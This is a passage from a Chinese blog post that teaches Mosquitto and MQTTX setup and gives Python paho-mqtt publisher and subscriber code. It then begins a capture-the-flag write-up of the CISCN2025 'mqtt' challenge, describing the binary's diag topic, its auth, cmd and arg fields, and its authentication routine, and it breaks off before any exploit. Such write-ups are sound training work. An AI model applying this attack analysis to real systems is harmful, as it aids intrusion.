href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-28-1024x444.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"444\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-28-1024x444.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-771\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%B8%8B%E8%BD%BDmqttx\"><\/span>\u4e0b\u8f7dmqttx<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p><a href=\"https:\/\/mqttx.app\/downloads?os=windows\">MQTTX Download<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-29-1024x750.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"750\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-29-1024x750.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-772\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u70b9\u51fb\u65b0\u5efa\u8fde\u63a5\uff0c\u6211\u8fd9\u91cc\u662fwsl\u542f\u52a8\u7684\uff0c\u4f46\u662f\u76d1\u542c\u4e86\u6240\u6709ip\u7684\u7aef\u53e3\uff0c\u6240\u4ee5ip\u76f4\u63a5\u586b0.0.0.0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-30-1024x754.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"754\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-30-1024x754.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-773\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6dfb\u52a0\u4e00\u4e2a\u8ba2\u9605<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-31.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"808\" height=\"976\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-31.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-774\"  sizes=\"(max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>\u5229\u7528\u7ec8\u7aef\u8fdb\u884c\u8fde\u63a5\u6d4b\u8bd5<\/p>\n\n\n\n<p>\u7ec8\u7aef\u8f93\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mosquitto_pub -h localhost -t testtopic -m \"Hello MQTT\"<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u5728\u5ba2\u6237\u7aef\u5df2\u7ecf\u6536\u5230\u4e86\u6d88\u606f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-32-1024x365.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"365\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-32-1024x365.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-775\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7ec8\u7aef\u8f93\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mosquitto_sub -h localhost -t testtopic<\/code><\/pre>\n\n\n\n<p>\u7528\u6765\u8ba2\u9605\u8fd9\u4e2a\u6d88\u606f\uff0c\u5728\u5ba2\u6237\u7aef\u8f93\u5165\u4e3b\u9898testtopic<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-33-1024x749.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"749\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-33-1024x749.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-776\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u53d1\u9001\u4e4b\u540e\uff0c\u5728\u5ba2\u6237\u7aef\u548c\u7ec8\u7aef\u754c\u9762\u5747\u53ef\u4ee5\u770b\u5230\u521a\u624d\u53d1\u7684\u6d88\u606f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-34-1024x511.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"511\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-34-1024x511.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-777\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"python%E4%BD%BF%E7%94%A8mqtt\"><\/span>python\u4f7f\u7528mqtt<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>pip install paho-mqtt<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%8F%91%E9%80%81%E7%AB%AF\"><\/span>\u53d1\u9001\u7aef<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code><em># -*- coding: utf-8 -*-# -*- coding: utf-8 -*-\n<\/em><em>\n<\/em><em>\n<\/em>import paho.mqtt.client as mqtt\nimport time\n\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"\u94fe\u63a5\")\n    print(\"Connected with result code: \" + str(rc))\n\n\ndef on_message(client, userdata, msg):\n    print(\"\u6d88\u606f\u5185\u5bb9\")\n    print(msg.topic + \" \" + str(msg.payload))\n\n\n<em>#   <\/em><em>\u8ba2\u9605\u56de\u8c03\n<\/em>def on_subscribe(client, userdata, mid, granted_qos):\n    print(\"\u8ba2\u9605\")\n    print(\"On Subscribed: qos = %d\" % granted_qos)\n    pass\n\n\n<em>#   <\/em><em>\u53d6\u6d88\u8ba2\u9605\u56de\u8c03\n<\/em>def on_unsubscribe(client, userdata, mid, granted_qos):\n    print(\"\u53d6\u6d88\u8ba2\u9605\")\n    print(\"On unSubscribed: qos = %d\" % granted_qos)\n    pass\n\n\n<em>#   <\/em><em>\u53d1\u5e03\u6d88\u606f\u56de\u8c03\n<\/em>def on_publish(client, userdata, mid):\n    print(\"\u53d1\u5e03\u6d88\u606f\")\n    print(\"On onPublish: qos = %d\" % mid)\n    pass\n\n\n<em>#   <\/em><em>\u65ad\u5f00\u94fe\u63a5\u56de\u8c03\n<\/em>def on_disconnect(client, userdata, rc):\n    print(\"\u65ad\u5f00\u94fe\u63a5\")\n    print(\"Unexpected disconnection rc = \" + str(rc))\n    pass\n\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_publish = on_publish\nclient.on_disconnect = on_disconnect\nclient.on_unsubscribe = on_unsubscribe\nclient.on_subscribe = on_subscribe\nclient.connect('127.0.0.1', 1883, 600)  <em># 600<\/em><em>\u4e3a<\/em><em>keepalive<\/em><em>\u7684\u65f6\u95f4\u95f4\u9694\n<\/em>while True:\n    client.publish(topic='testtopic', payload='amazing', qos=0, retain=False)\n    time.sleep(2)<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-35-1024x394.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"394\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-35-1024x394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-778\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-37.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"795\" height=\"666\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-780\"  sizes=\"(max-width: 795px) 100vw, 795px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E6%8E%A5%E6%94%B6%E7%AB%AF\"><\/span>\u63a5\u6536\u7aef<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code># -*- coding: utf-8 -*-# -*- coding: utf-8 -*-\n\n\nimport paho.mqtt.client as mqtt\nimport time\n\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"\u94fe\u63a5\")\n    print(\"Connected with result code: \" + str(rc))\n\n\ndef on_message(client, userdata, msg):\n    print(\"\u6d88\u606f\u5185\u5bb9\")\n    print(msg.topic + \" \" + str(msg.payload))\n\n\n#   \u8ba2\u9605\u56de\u8c03\ndef on_subscribe(client, userdata, mid, granted_qos):\n    print(\"\u8ba2\u9605\")\n    print(\"On Subscribed: qos = %d\" % granted_qos)\n    pass\n\n\n#   \u53d6\u6d88\u8ba2\u9605\u56de\u8c03\ndef on_unsubscribe(client, userdata, mid, granted_qos):\n    print(\"\u53d6\u6d88\u8ba2\u9605\")\n    print(\"On unSubscribed: qos = %d\" % granted_qos)\n    pass\n\n\n#   \u53d1\u5e03\u6d88\u606f\u56de\u8c03\ndef on_publish(client, userdata, mid):\n    print(\"\u53d1\u5e03\u6d88\u606f\")\n    print(\"On onPublish: id = %d\" % mid)\n    pass\n\n\n#   \u65ad\u5f00\u94fe\u63a5\u56de\u8c03\ndef on_disconnect(client, userdata, rc):\n    print(\"\u65ad\u5f00\u94fe\u63a5\")\n    print(\"Unexpected disconnection rc = \" + str(rc))\n    pass\n\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_publish = on_publish\nclient.on_disconnect = on_disconnect\nclient.on_unsubscribe = on_unsubscribe\nclient.on_subscribe = on_subscribe\nclient.connect('127.0.0.1', 1883, 600)  # 600\u4e3akeepalive\u7684\u65f6\u95f4\u95f4\u9694\n\nclient.subscribe('testtopic', qos=0)\n\nclient.loop_forever() # \u4fdd\u6301\u8fde\u63a5\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-39.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"981\" height=\"747\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-39.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-782\"  sizes=\"(max-width: 981px) 100vw, 981px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-38-1024x214.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"214\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-38-1024x214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-781\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%BE%8B%E9%A2%98%E8%AE%B2%E8%A7%A3\"><\/span>\u4f8b\u9898\u8bb2\u89e3<span class=\"ez-toc-section-end\"><\/span><\/h1>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"CISCN2025%E2%80%94%E2%80%94final-mqtt\"><\/span>CISCN2025\u2014\u2014final mqtt<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90\"><\/span>\u9898\u76ee\u5206\u6790<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"991\" height=\"233\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-784\"  sizes=\"(max-width: 991px) 100vw, 991px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"744\" height=\"167\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-786\"  sizes=\"(max-width: 744px) 100vw, 744px\" \/><\/div><\/figure>\n\n\n\n<p>\u7a0b\u5e8f\u9996\u5148\u4f1a\u8bfb\u53d6\u4e24\u4e2a\u6587\u4ef6\uff0c\u5982\u679c\u6587\u4ef6\u4e0d\u5b58\u5728\u5219\u76f4\u63a5\u9000\u51fa<\/p>\n\n\n\n<p>\u6240\u4ee5\u9996\u5148\u9700\u8981\u521b\u5efa\u4e24\u4e2a\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-40.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"569\" height=\"312\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-40.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-783\"  sizes=\"(max-width: 569px) 100vw, 569px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u4f1a\u521b\u5efa\u4e00\u4e2amqtt\u5ba2\u6237\u7aef\uff0c\u4f46\u662f\u8fd9\u91cc\u8981\u6c42broker\u7684\u76d1\u542c\u7aef\u53e3\u662f9999\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u6539\u4e00\u4e0b\u7aef\u53e3\uff0c\u4fee\u6539\u65b9\u5f0f\u4e0a\u6587\u8bf4\u8fc7<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-44-1024x343.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"343\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-44-1024x343.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-787\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6210\u529f\u542f\u52a8\u670d\u52a1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"600\" height=\"391\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-788\"  sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div><\/figure>\n\n\n\n<p>\u9996\u5148\u7a0b\u5e8f\u4f1a\u5728\u8ba2\u9605\u7684diag\u4e3b\u9898\u4e2d\u63a5\u53d7auth\uff0ccmd\uff0carg\u4e09\u4e2a\u53c2\u6570\uff0c\u800c\u4e14arg\u53c2\u6570\u5b58\u653e\u5728bss\u6bb5\u4e0a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-47.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"849\" height=\"623\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-47.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-790\"  sizes=\"(max-width: 849px) 100vw, 849px\" \/><\/div><\/figure>\n\n\n\n<p>\u5728start_routine\u51fd\u6570\u4e2d\uff0c\u4f1a\u9996\u5148\u8fdb\u884c\u4e00\u4e2a\u8ba4\u8bc1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-48.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"828\" height=\"672\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-48.png\" 